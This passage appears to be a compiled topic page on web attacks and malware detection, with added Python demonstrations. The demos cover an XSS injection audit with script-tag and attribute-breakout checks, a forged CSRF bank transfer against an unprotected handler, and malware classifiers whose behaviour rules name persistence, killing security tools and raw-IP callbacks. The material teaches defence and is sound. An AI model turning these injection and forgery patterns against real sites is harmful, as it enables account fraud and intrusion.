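TAG_RE = re.compile(r"<\s*/?\s*script", re.IGNORECASE)


def has_script_tag(rendered):
    """True if a live <script> tag survived into the rendered page."""
    return bool(TAG_RE.search(rendered))


def attribute_broken(rendered):
    """True if user data closed the value attribute and injected a handler."""
    return ' onmouseover="' in rendered


RENDERERS = {"unsafe": render_unsafe, "naive": render_naive, "safe": render_safe}


def audit():
    """For each renderer, count the payloads that still produce a live injection."""
    report = {}
    for label, render in RENDERERS.items():
        hits = 0
        for payload in PAYLOADS:
            out = render(payload)
            if has_script_tag(out) or attribute_broken(out):
                hits += 1
        report[label] = hits
    return report


if __name__ == "__main__":
    for label, hits in audit().items():
        print(f"{label:6s} live injections: {hits}/{len(PAYLOADS)}")
    print(render_safe(PAYLOADS[3]))
```

The naive filter stops only the textbook payload; the case variant, the nested tag that reassembles after stripping, and the attribute breakout all get through. Output encoding handles all four because it never tries to recognise attacks, it only makes the data unable to change the document's structure.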

Mitigating Cross-Site Request Forgery Attacks

These are the worst types of attacks in some people's eyes. A CSRF attack rides on the authenticated session you have open in another browser tab or window, such as your bank account, and submits requests in your name. Once again, unfortunately, there is not a whole lot we can do from the end-user standpoint to protect ourselves. We can implement everything we discussed earlier, such as:

Not clicking on links we don't trust.

Not opening e-mail we did not expect to receive.

Disabling active content.

Disabling scripts.

There are a few additional items we can do in addition to all of the mitigation techniques we have already discussed:

Do not connect to other sites while being connected to your bank account.

Do not connect to other sites while being connected to your trading account.

Log out of the account when you are finished.

Limit your time and activity on sites.

Log in to your accounts, get done what you need to, and then disconnect.

Once again, these are common-sense items we should all follow. However, most of us have our Facebook, Twitter, MySpace, and bank account sites open all at the same time, not to mention another window opened for general browsing. This is a recipe for disaster.
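Why the end user can do so little, and what the site itself has to do, as an added example in Python that is not from the chapter. The bank, the session store and the request objects are hypothetical models of an HTTP exchange; the forged request is what an auto-submitting form on an attacker's page produces, with the browser attaching the victim's session cookie exactly as it does for a genuine request. The vulnerable handler checks only that cookie; the hardened one also demands a synchronizer token (here an HMAC of the session id, so nothing extra is stored server-side) that an attacker's page cannot read or forge.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

SECRET_KEY = secrets.token_bytes(32)   # assumption: per-deployment server key


@dataclass
class Session:
    user: str
    sid: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    """Constructed model of an HTTP request: method, cookies the browser
    attached automatically, and the submitted form body."""
    method: str
    cookies: dict
    form: dict


SESSIONS = {}


def login(user):
    s = Session(user)
    SESSIONS[s.sid] = s
    return s


def csrf_token(session):
    """Token bound to the session via HMAC: only a page served by this site
    (which embeds it in its forms) can present a valid one."""
    return hmac.new(SECRET_KEY, session.sid.encode(), hashlib.sha256).hexdigest()


def current_session(req):
    return SESSIONS.get(req.cookies.get("sid"))


def transfer_vulnerable(req, ledger):
    """Checks only the session cookie, which the browser also sends on
    requests initiated by other sites."""
    s = current_session(req)
    if req.method != "POST" or s is None:
        return 403
    ledger.append((s.user, req.form["to"], int(req.form["amount"])))
    return 200


def transfer_hardened(req, ledger):
    """Additionally requires the synchronizer token, compared in constant time."""
    s = current_session(req)
    if req.method != "POST" or s is None:
        return 403
    supplied = req.form.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), csrf_token(s).encode()):
        return 403
    ledger.append((s.user, req.form["to"], int(req.form["amount"])))
    return 200


def scenario():
    """Run one forged and one genuine transfer through both handlers."""
    victim = login("alice")
    cookies = {"sid": victim.sid}   # attached by the browser to every bank request
    forged = Request("POST", cookies, {"to": "overseas-co", "amount": "1000"})
    genuine = Request("POST", cookies,
                      {"to": "power-utility", "amount": "120",
                       "csrf_token": csrf_token(victim)})
    results = {}
    for name, handler in (("vulnerable", transfer_vulnerable),
                          ("hardened", transfer_hardened)):
        ledger = []
        results[name] = (handler(forged, ledger), handler(genuine, ledger), ledger)
    return results


if __name__ == "__main__":
    for name, (forged_rc, genuine_rc, ledger) in scenario().items():
        print(f"{name:10s} forged={forged_rc} genuine={genuine_rc} ledger={ledger}")
```

Nothing the victim did differently would have changed the vulnerable outcome: the cookie was sent because the session was open, which is exactly what the advice to log out and to avoid other sites while banking is working around. The token check is the site's fix; a `SameSite` cookie attribute is the usual second layer.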

Epic Fail

There was a friend, whose name we won't mention, who fell victim to a CSRF attack. This friend had implemented every security precaution you could think of: dual forms of antivirus and spyware protection, as well as a desktop firewall with some host-based intrusion prevention options. However, this friend still managed to lose $1,000.00. This friend was paying his bills through his online bank account when he received an e-mail from a friend telling him to check out a site about a place they were going to visit. Little did either of them know that this site had a CSRF attack placed on it. When my friend visited the site, the attack proceeded and the money ended up being sent as a payment from his account to a company overseas for “services rendered.” He was able to get his money back by calling the fraud department and explaining what had happened. However, it took a while and was a really big pain. This just goes to show it can happen to anyone.


URL: https://www.sciencedirect.com/science/article/pii/B9781597495455000021

Malware detection employed by visualization and deep neural network

Anson Pinhero, ... AnanthaKrishnan S, in Computers & Security, 2021

2.1 Similarity based malware detection techniques

Zhong et al. (2012) created a feature database from the analysis of known malware programs. For an unknown sample, its features are compared with the contents of the database to determine which family it belongs to. The authors use a filtering algorithm based on a one-class SVM to calculate similarity. They evaluated the approach on 113 malware samples and observed that it consumes less time for similarity calculation. Kang et al. (2012) propose a malware classification method based on block comparison; it identifies the core parts of binaries that can represent a malware family and thus reduces the overhead of comparing whole files.

Andro-profiler (Jang et al., 2016) is a behavior-based mobile malware detector. It executes the malicious application on an emulator to extract integrated system logs, then generates behavior profiles by analyzing those logs. It compares the behavior profile of the application with representative behavior profiles for each malware family using a weighted similarity matching technique. Taheri et al. (2019) proposed four malware detection techniques based on Hamming distance: first nearest neighbors (FNN), all nearest neighbors (ANN), weighted all nearest neighbors (WANN), and k-medoid based nearest neighbors (KMNN). They evaluated these techniques on three datasets of benign and malicious Android apps, Drebin, Contagio and Genome, using API calls, intents and permissions as features. Using API calls as features, they achieved higher accuracy than other state-of-the-art methods.
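Hamming-distance nearest-neighbour classification over binary feature vectors, as an added example in Python that is not from the article and is not Taheri et al.'s code. The feature universe (a few Android permissions and API calls), the labelled reference set and the unknown samples are all constructed; the exact weighting and tie-breaking used by the paper's WANN variant are not described on this page, so the weights below (1/(1+distance), ties resolved toward “malware”) are assumptions. The example includes a deliberately ambiguous sample to show where FNN, ANN and WANN part ways.

```python
from collections import Counter

# Constructed feature universe: permissions and API calls as binary features.
FEATURES = [
    "perm.INTERNET", "perm.SEND_SMS", "perm.READ_CONTACTS",
    "perm.RECEIVE_BOOT_COMPLETED", "api.SmsManager.sendTextMessage",
    "api.TelephonyManager.getDeviceId", "api.Runtime.exec",
    "api.DexClassLoader", "api.HttpURLConnection",
]


def vectorize(present):
    """Binary feature vector over FEATURES, as a tuple of 0/1."""
    present = set(present)
    return tuple(1 if f in present else 0 for f in FEATURES)


# Constructed labelled reference set; Drebin/Contagio/Genome would supply thousands.
REFERENCE = [
    ("benign",  vectorize(["perm.INTERNET", "api.HttpURLConnection"])),
    ("benign",  vectorize(["perm.INTERNET", "perm.READ_CONTACTS", "api.HttpURLConnection"])),
    ("benign",  vectorize(["api.HttpURLConnection"])),
    ("malware", vectorize(["perm.INTERNET", "perm.SEND_SMS",
                           "api.SmsManager.sendTextMessage", "api.TelephonyManager.getDeviceId"])),
    ("malware", vectorize(["perm.SEND_SMS", "perm.RECEIVE_BOOT_COMPLETED",
                           "api.SmsManager.sendTextMessage", "api.DexClassLoader"])),
    ("malware", vectorize(["perm.INTERNET", "api.Runtime.exec", "api.DexClassLoader",
                           "api.HttpURLConnection"])),
]


def hamming(a, b):
    """Number of feature positions at which two vectors differ."""
    return sum(x != y for x, y in zip(a, b))


def majority(votes):
    # Assumption: ties fail closed, i.e. resolve toward "malware".
    return max(votes, key=lambda lab: (votes[lab], lab == "malware"))


def fnn(sample, reference=REFERENCE):
    """First nearest neighbour: label of the single closest reference vector.
    On a distance tie the answer depends on reference order."""
    label, _ = min(reference, key=lambda r: hamming(sample, r[1]))
    return label


def ann(sample, reference=REFERENCE):
    """All nearest neighbours: vote among every vector at the minimum distance."""
    dists = [(hamming(sample, v), label) for label, v in reference]
    dmin = min(d for d, _ in dists)
    return majority(Counter(label for d, label in dists if d == dmin))


def wann(sample, reference=REFERENCE):
    """Weighted all nearest neighbours: every reference vector votes with
    weight 1/(1+distance), so the whole neighbourhood is heard."""
    votes = Counter()
    for label, v in reference:
        votes[label] += 1.0 / (1 + hamming(sample, v))
    return majority(votes)


# Constructed unknown apps.
SAMPLES = {
    "sms_trojan_variant": vectorize(["perm.INTERNET", "perm.SEND_SMS",
                                     "api.SmsManager.sendTextMessage",
                                     "api.TelephonyManager.getDeviceId", "api.HttpURLConnection"]),
    "contacts_app": vectorize(["perm.INTERNET", "perm.READ_CONTACTS",
                               "perm.RECEIVE_BOOT_COMPLETED", "api.HttpURLConnection"]),
    "ambiguous": vectorize(["perm.INTERNET", "perm.SEND_SMS",
                            "api.SmsManager.sendTextMessage", "api.HttpURLConnection"]),
}


def classify_all():
    return {name: (fnn(v), ann(v), wann(v)) for name, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdicts in classify_all().items():
        print(f"{name:20s} FNN={verdicts[0]:8s} ANN={verdicts[1]:8s} WANN={verdicts[2]}")
```

The ambiguous sample sits at distance 2 from both a benign and a malware reference: FNN returns whichever comes first in the reference list, ANN sees the tie and fails closed, and WANN lets the rest of the set decide. That order-dependence is the practical reason to prefer the all-neighbour variants when two families share most of their permissions.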


URL: https://www.sciencedirect.com/science/article/pii/S0167404821000717

A survey on machine learning-based malware detection in executable files

Jagsir Singh, Jaswinder Singh, in Journal of Systems Architecture, 2021

7 Future directive

The question now is how to develop a malware classifier that can cope with these issues. Malware analysts continuously analyze malware samples and update the detection system to stop new attacks, but signature-based techniques alone are almost helpless against new malware. Behaviour-based detection therefore offers hope for handling unknown malware. We propose a hybrid framework, unlike previously proposed hybrid techniques, implemented as a two-layered architecture. At the first level, signature-based detection is performed; if it does not produce a verdict, the second level applies behaviour-based analysis. The first layer can easily detect known and unobfuscated malware, while dynamic analysis can predict unknown malware from its run-time features. On each occurrence of new malware, the database is updated so that it can be used to detect future malware. Fig. 9 shows the framework of the malware detection system.

In this technique, dynamic analysis will be performed using both automatic sandboxing (such as Cuckoo Sandbox) and dynamic analysis tools such as OllyDbg, Regshot, Wireshark and ProcMon to gather runtime features. Static analysis will be done using tools such as PE Explorer, PEview, PEiD and IDA Pro to extract static features such as strings, imports and exports. Malware classifiers will then be trained using machine learning algorithms. This technique inherits the advantages of both signature-based and behaviour-based techniques: it detects known malware efficiently and detects unknown malware from its runtime behaviour. In addition, during static and dynamic analysis we will apply anti-obfuscation techniques so that samples are analyzed properly. This is only achievable after analyzing malware and benign samples with both static and dynamic analysis techniques.

Table 12. Chronological study of various famous malware.

Year | Malware attacks
1986 | The Brain virus, the first IBM-PC virus, was released.
1987 | The Jerusalem virus was developed to destroy files every Friday the 13th. It was the first time-triggered malware.
1988 | The famous Morris Worm was created and spread all over the world through the Internet.
1991 | The Michelangelo virus was designed to infect DOS systems.
1999 | More advanced malware such as the Melissa worm, the Happy99 virus and the Kak worm appeared. They were spread by Internet users.
2000 | ILOVEYOU, a VBScript worm, infected millions of Windows systems.
2001 | The CodeRed worm compromised systems by exploiting a buffer overflow vulnerability, and the Anna Kournikova e-mail worm affected mail servers all over the world. Nimda, which affected Windows-based systems, was also released in 2001.
2002–2003 | Internet users were plagued by unwanted pop-ups and malicious JavaScript code. Social engineering spam and worms for stealing credit card details started appearing. Notable worms such as Slammer and Blaster slowed Internet services for users and executed DoS attacks.
2004 | The MyDoom, Netsky and Bagle e-mail worms were created amid competition between their authors. This actually helped to improve the e-mail filtering and scanning systems of the time.
2005 | The Sony rootkit was created, which led to the development of modern-day rootkit malware.
2006 | Monetary scams such as lottery, phishing and Nigerian 419 scams were widespread.
2007 | Websites were compromised across large parts of the globe, with crimeware kits used to serve exploits on the Internet. Notable compromised sites included The Sun, the Miami Dolphins Stadium, MySpace, Photobucket and the India Times. SQL injection attacks also began by the end of this year.
2008 | Website hacking and the theft of FTP credentials took off. PCs were also compromised and controlled to perform malicious activities without the user's knowledge. In June 2008, the Asprox botnet (a network of compromised PCs) executed a SQL injection attack, and Walmart was reported as a victim of SQL injection.
2009 | Gumblar infected Windows systems running older OS versions; this weakness of older systems was used to build a botnet of such users.
2010 | Stuxnet, a very famous cyber attack, showed the world what a malware attack can do to industrial or organizational systems. It was destructive enough to damage Iranian nuclear centrifuges and is viewed as one of the most advanced pieces of malware ever created.
2011 | The ZeroAccess Trojan horse was created for Windows systems. It was downloaded onto systems through a botnet, kept hidden in the operating system using rootkit techniques, and spread via Bitcoin-mining software.
2012 | Shamoon attacked computers in the energy sector, and the CrySyS cybersecurity lab documented a very complex malware. Flame, a well-known cyber-espionage malware, was active especially in Asia.
2013 | Ransomware was on the rise. The CryptoLocker Trojan horse encrypted users' files and demanded a ransom for the decryption key. Other malware such as Gameover Zeus used keystroke logging to steal users' login credentials.
2014 | The Regin Trojan horse was developed for mass surveillance and espionage purposes in the UK and US.
2016 | Locky ransomware encrypted the data of millions of computers in Europe. Mirai executed a very destructive DDoS attack on the various well
2017 | WannaCry, one of the most destructive ransomware attacks, happened on 12 May 2017. It encrypted the data of millions of users in more than 150 countries and did millions of dollars of damage. Another ransomware, Petya, was released this year as an advanced version of the earlier Petya (2016).
2018–20 | Various crypto miners and ransomware were developed, such as SamSam ransomware, the COVID19 RAT, Clop ransomware and Cyborg ransomware.

The aim of the proposed technique is to bridge the gap between signature-based and behaviour-based techniques. The two-layered hybrid model will allow a real-time implementation of the malware detection system. Also, the application of multiple ML algorithms will give the hybrid model more resilience against adversarial machine learning.
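The two-layer flow described above (signature layer first, behaviour layer only when it has no verdict, database updated when the second layer catches something), as an added example in Python that is not from the article and is not the authors' framework. It also serves as a concrete instance of the page's recurring definition of signature-based detection: recognising characteristics of known malware files, here whole-file SHA-256 hashes and byte patterns. The samples, byte signatures, behaviour rules, weights and the stand-in sandbox log are all constructed; in the real framework the events would come from Cuckoo or ProcMon and the rules from a trained classifier.

```python
import hashlib

# Layer 1: byte patterns taken from known samples (constructed for this example).
BYTE_SIGNATURES = {
    "Demo.Dropper.A": b"\\Temp\\svch0st.exe",
    "Demo.Keylogger.B": b"SetWindowsHookExA\x00klog.dat",
}


# Layer 2: behaviour rules over sandbox events, each event being (kind, detail).
def writes_exe_to_temp(e):
    kind, d = e[0], e[1].lower()
    return kind == "file_write" and d.endswith(".exe") and "\\temp\\" in d


def sets_run_key(e):
    return e[0] == "reg_set" and "\\currentversion\\run\\" in e[1].lower()


def kills_security_tool(e):
    return e[0] == "process" and "taskkill" in e[1].lower()


def connects_to_raw_ip(e):
    return e[0] == "net_connect" and e[1][0].isdigit()


BEHAVIOUR_RULES = [            # (description, predicate, weight); weights are assumed
    ("writes an executable to Temp", writes_exe_to_temp, 3),
    ("adds a Run-key persistence entry", sets_run_key, 3),
    ("kills a security process", kills_security_tool, 2),
    ("connects to a raw IP address", connects_to_raw_ip, 2),
]
BEHAVIOUR_THRESHOLD = 5


# Constructed samples and the events a sandbox would report for each.
SAMPLES = {
    "known_dropper": b"MZ\x90\x00payload...\\Temp\\svch0st.exe...",
    "packed_unknown": b"MZ\x90\x00UPX0\x00\x00" + bytes(range(256)),  # no signature hit
    "benign_updater": b"MZ\x90\x00update.example.com...",
}
SANDBOX_LOG = {
    "packed_unknown": [
        ("file_write", "C:\\Users\\u\\AppData\\Local\\Temp\\svc.exe"),
        ("reg_set", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svc"),
        ("net_connect", "203.0.113.7:443"),
    ],
    "benign_updater": [
        ("file_write", "C:\\Program Files\\App\\app.log"),
        ("net_connect", "update.example.com:443"),
    ],
}


def fake_sandbox(name):
    """Stand-in for executing the sample in Cuckoo and collecting its events."""
    return SANDBOX_LOG.get(name, [])


class HybridDetector:
    def __init__(self):
        self.known_hashes = set()
        self.byte_signatures = dict(BYTE_SIGNATURES)

    def signature_layer(self, blob):
        digest = hashlib.sha256(blob).hexdigest()
        if digest in self.known_hashes:
            return "known-hash"
        for name, pattern in self.byte_signatures.items():
            if pattern in blob:
                return name
        return None

    def behaviour_layer(self, events):
        score, hits = 0, []
        for desc, rule, weight in BEHAVIOUR_RULES:
            if any(rule(e) for e in events):
                score += weight
                hits.append(desc)
        return score, hits

    def analyze(self, name, blob, run_sample=fake_sandbox):
        """Layer 1 first; only if it has no verdict, run the sample and score it."""
        sig = self.signature_layer(blob)
        if sig:
            return {"verdict": "malicious", "layer": 1, "reason": sig}
        score, hits = self.behaviour_layer(run_sample(name))
        if score >= BEHAVIOUR_THRESHOLD:
            # Feed the new sample back into layer 1 so the next copy is caught cheaply.
            self.known_hashes.add(hashlib.sha256(blob).hexdigest())
            return {"verdict": "malicious", "layer": 2, "reason": hits, "score": score}
        return {"verdict": "benign", "layer": 2, "reason": hits, "score": score}


if __name__ == "__main__":
    det = HybridDetector()
    for name in ("known_dropper", "packed_unknown", "packed_unknown", "benign_updater"):
        print(name, det.analyze(name, SAMPLES[name]))
```

Running the packed sample twice is the point of the feedback step: the first pass costs a sandbox run and is decided by behaviour, the second is decided by the hash in layer 1 without executing anything. The hash only matches an identical file, so a repacked variant would again fall through to layer 2, which is where the byte-pattern and behaviour rules earn their keep.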


URL: https://www.sciencedirect.com/science/article/pii/S1383762120301442

A survey of malware detection in Android apps: Recommendations and perspectives for future research

Asma Razgallah, ... Kobra Khanmohammadi, in Computer Science Review, 2021

2.3 Other methods

Finally, we list in a third category static methods that do not fall squarely into API or source code analysis.

2.3.1 DroidRanger

The DroidRanger tool [33] detects the characteristic behaviors present in malware from several malicious families. It relies on a crawler to collect Android applications from existing Android markets and stores them in a local repository. For each application collected, DroidRanger extracts the fundamental properties associated with it (requested permissions, author information, etc.) and organizes them in a central database.

DroidRanger performs two distinct detection processes. The first, for known malware, is based on a permission-based behavioral footprint. The second, for previously unknown malware, is based on a heuristic analysis of the app’s behavior, as reconstructed from the bytecode and the manifest file. Suspicious applications are then executed and monitored to verify if they actually display malicious behavior at runtime. If this is the case, the associated behavioral fingerprint will be extracted and included in the first detection process’ database.

The study was evaluated on the most popular applications of 2011 and yielded positive results. However, DroidRanger covers only free applications and only five Android markets, and it has a false negative rate of 4.2%.

2.3.2 DREBIN

Arp et al. created DREBIN [4], a tool that performs malware detection on the results of a static analysis of applications. DREBIN’s feature set appears to be one of the most thorough among the works we have surveyed. In all, they extract 8 feature sets for each app, using data from the Android manifest (including permissions, components and requested hardware) and from the decompiled .dex file (including selected API calls and network addresses). The entire feature set is constructed in linear time, without complex static analysis such as data flow analysis.

Detection is then performed using SVMs. To maintain a lightweight footprint on the end user’s device, training is not performed on the smartphone itself; the classifier is trained offline and only the resulting model is passed to the device. To explain its results, DREBIN’s classifier is used not only to detect but also to identify the features that led to an application being flagged as malware. From these, DREBIN constructs a parametrized sentence that explains the reason for the verdict to the user.

DREBIN was tested using 131,611 benign apps from the Google Play Store and two other markets (one Chinese and one Russian), and 5,560 malware samples from the Android Malware Genome Project [34]. It obtained a detection rate of 93% with only 1% false positives, outperforming several antivirus products on the same dataset.
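The DREBIN pipeline in miniature (string features grouped by origin, an offline-trained linear model, and an explanation built from the features that pushed the score over the line), as an added example in Python that is not from the survey and is not the DREBIN code. The feature prefixes, the eight-app training corpus and the explanation wording are constructed; a perceptron stands in for the linear SVM because it needs no library and the explanation mechanism, reading off the weights of the features present in the app, is the same for any linear model.

```python
# Constructed training corpus.  Each app is a set of string features with an
# assumed prefix for where it came from: perm:: and comp:: from the manifest,
# api:: and url:: from the decompiled dex.  Treating a feature as an opaque
# string is what keeps extraction linear in the size of the app.
TRAIN = [
    ("benign",  {"perm::INTERNET", "api::HttpURLConnection.connect", "comp::MainActivity"}),
    ("benign",  {"perm::INTERNET", "perm::ACCESS_FINE_LOCATION",
                 "api::LocationManager.requestLocationUpdates", "comp::MapActivity"}),
    ("benign",  {"perm::INTERNET", "perm::READ_CONTACTS",
                 "api::ContentResolver.query", "comp::ContactsActivity"}),
    ("benign",  {"comp::MainActivity", "api::SharedPreferences.edit"}),
    ("malware", {"perm::INTERNET", "perm::SEND_SMS", "api::SmsManager.sendTextMessage",
                 "url::203.0.113.7", "comp::BootReceiver"}),
    ("malware", {"perm::SEND_SMS", "perm::READ_PHONE_STATE",
                 "api::TelephonyManager.getDeviceId", "api::SmsManager.sendTextMessage",
                 "url::198.51.100.9"}),
    ("malware", {"perm::INTERNET", "api::DexClassLoader.loadClass", "api::Runtime.exec",
                 "url::203.0.113.7", "comp::BootReceiver"}),
    ("malware", {"perm::INTERNET", "perm::READ_PHONE_STATE",
                 "api::TelephonyManager.getDeviceId", "api::DexClassLoader.loadClass",
                 "comp::BootReceiver"}),
]


def build_vocab(data):
    return {f: i for i, f in enumerate(sorted({f for _, feats in data for f in feats}))}


def train_perceptron(data, epochs=50):
    """Offline training of a linear model (w, b) with the perceptron rule,
    standing in for the SVM.  Stops early once every sample is classified."""
    index = build_vocab(data)
    w = [0.0] * len(index)
    b = 0.0
    for _ in range(epochs):
        mistakes = 0
        for label, feats in data:
            y = 1 if label == "malware" else -1
            s = b + sum(w[index[f]] for f in feats)
            if y * s <= 0:
                mistakes += 1
                for f in feats:
                    w[index[f]] += y
                b += y
        if mistakes == 0:
            break
    return {"index": index, "w": w, "b": b}


def score(model, feats):
    index, w = model["index"], model["w"]
    # Features never seen in training carry no weight and are ignored.
    return model["b"] + sum(w[index[f]] for f in feats if f in index)


def predict(model, feats):
    return "malware" if score(model, feats) > 0 else "benign"


def explain(model, feats):
    """Features present in the app with a positive weight, strongest first:
    the raw material for the explanation sentence."""
    index, w = model["index"], model["w"]
    contrib = [(f, w[index[f]]) for f in feats if f in index and w[index[f]] > 0]
    return sorted(contrib, key=lambda fw: (-fw[1], fw[0]))


def verdict_sentence(model, feats):
    if predict(model, feats) == "benign":
        return "No malicious indicators found."
    names = ", ".join(f for f, _ in explain(model, feats)[:3])
    return f"Flagged as malware because the app uses: {names}."


def training_accuracy(model, data=TRAIN):
    correct = sum(predict(model, feats) == label for label, feats in data)
    return correct / len(data)


MODEL = train_perceptron(TRAIN)   # what would be shipped to the device

if __name__ == "__main__":
    print("training accuracy:", training_accuracy(MODEL))
    for label, feats in TRAIN[3:5]:
        print(label, "->", predict(MODEL, feats), "|", verdict_sentence(MODEL, feats))
```

The model shipped to the handset is just the weight vector; scoring an app is one pass over its feature strings, and the explanation is the sorted list of positive contributors, which is exactly the information a user-facing sentence needs. Note that the explanation is only as honest as the model: a feature with a large weight learned from a small corpus is a correlation, not a proof of intent.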


URL: https://www.sciencedirect.com/science/article/pii/S1574013720304585

Which type of antimalware software detects and mitigates malware by recognizing general features shared by various types of malware?

Malwarebytes is an example of an antimalware tool that handles detection and removal of malware. It can remove malware from Windows, macOS, Android and iOS platforms. Malwarebytes can scan a user's registry files, running programs, hard drives and individual files.

Which antimalware software approach can recognize?

What type of antimalware program is able to detect viruses by recognizing various characteristics of a known malware file? Using a signature-based approach, host security software detects viruses and other malware by recognizing characteristics of known malware files, such as file hashes or byte patterns extracted from known samples.

What is malware protection software?

What is antimalware (anti-malware)? Antimalware is a type of software program created to protect information technology (IT) systems and individual computers from malicious software, or malware. Antimalware programs scan a computer system to prevent, detect and remove malware.

What are anti

Comodo, for example, includes BOClean Anti-Malware Protection Software, an advanced security feature that destroys malware as soon as it enters the computer. Trend Micro has a sandbox in which suspicious files are analyzed. Kaspersky has a Security Cloud that adapts to your browsing habits to keep you protected.